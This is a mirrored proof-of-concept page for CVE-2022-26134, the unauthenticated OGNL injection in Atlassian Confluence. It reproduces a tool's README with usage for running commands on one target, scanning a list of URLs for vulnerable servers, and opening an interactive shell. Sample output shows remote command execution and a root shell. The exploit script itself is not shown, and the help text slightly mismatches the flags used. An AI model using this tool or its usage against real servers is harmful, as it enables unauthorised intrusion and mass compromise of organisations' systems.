CVE-2022-26134 PoC — Atlassian Confluence Server 注入漏洞

Source

https://github.com/Luchoane/CVE-2022-26134_conFLU

Associated Vulnerability

Title:Atlassian Confluence Server 注入漏洞 (CVE-2022-26134)
Description:In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are from 1.3.0 before 7.4.17, from 7.13.0 before 7.13.7, from 7.14.0 before 7.14.3, from 7.15.0 before 7.15.2, from 7.16.0 before 7.16.4, from 7.17.0 before 7.17.4, and from 7.18.0 before 7.18.1.

Description

PoC for exploiting CVE-2022-26134 on Confluence

Readme

# CVE-2022-26134 - conFLU

PoC for exploiting CVE-2022-26134 on Atlassian Confluence

### Exploit Usage

```
python3 conFLU.py -h
Usage: conFLU.py [-h] [-u URL] [-f F] [-cmd CMD]

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     target url
  -f F, --file F        url file
  -c CMD, --command CMD
                        command
  ```
  

#### Exploit single target:
```
$ python3 conFLU.py -u http://[redacted].com -c id


                           ******** **       **     **
                          /**///// /**      /**    /**
  *****   ******  ******* /**      /**      /**    /**
 **///** **////**//**///**/******* /**      /**    /**
/**  // /**   /** /**  /**/**////  /**      /**    /**
/**   **/**   /** /**  /**/**      /**      /**    /**
//***** //******  ***  /**/**      /********//*******
 /////   //////  ///   // //       ////////  ///////

                       </coded by Luchoane>

[++++++] VULNERABLE: https://xxx.xxx.xxx.xxx | [uid=1009(confluence) gid=1009(confluence) groups=1009(confluence)]
```



#### Exploit url list
```
$ python3 conFLU.py -f list.txt -c id

                           ******** **       **     **
                          /**///// /**      /**    /**
  *****   ******  ******* /**      /**      /**    /**
 **///** **////**//**///**/******* /**      /**    /**
/**  // /**   /** /**  /**/**////  /**      /**    /**
/**   **/**   /** /**  /**/**      /**      /**    /**
//***** //******  ***  /**/**      /********//*******
 /////   //////  ///   // //       ////////  ///////

                       </coded by Luchoane>

[-] NOT VULNERABLE: https://xxx.xxx.xxx.xxx
[!] There was an error connecting!
[!] There was an error connecting!
[++++++] VULNERABLE: https://xxx.xxx.xxx.xxx | [uid=1009(confluence) gid=1009(confluence) groups=1009(confluence)]

--------------------------
Vulnerable targets scanned:
[+] https://xxx.xxx.xxx.xxx
```



#### Interactive shell
```
$ python3 conFLU.py -s xxx.xxx.xxx.xxx

                           ******** **       **     **
                          /**///// /**      /**    /**
  *****   ******  ******* /**      /**      /**    /**
 **///** **////**//**///**/******* /**      /**    /**
/**  // /**   /** /**  /**/**////  /**      /**    /**
/**   **/**   /** /**  /**/**      /**      /**    /**
//***** //******  ***  /**/**      /********//*******
 /////   //////  ///   // //       ////////  ///////

                       </coded by Luchoane>

Welcome to the interactive shell for: https://xxx.xxx.xxx.xxx
User: root

> id
uid=0(root) gid=0(root) groups=0(root)

> cat /etc/hosts
127.0.0.1   localhost localhost.localdomain localhost4 localhost4.localdomain4 ::1         localhost6 localhost6.localdomain6

> 
```

File Snapshot


 [4.0K]  /data/pocs/440ccbacfa5d40865dc219b39554bba798a46402
├── [4.9K]  conFLU.py
└── [2.7K]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!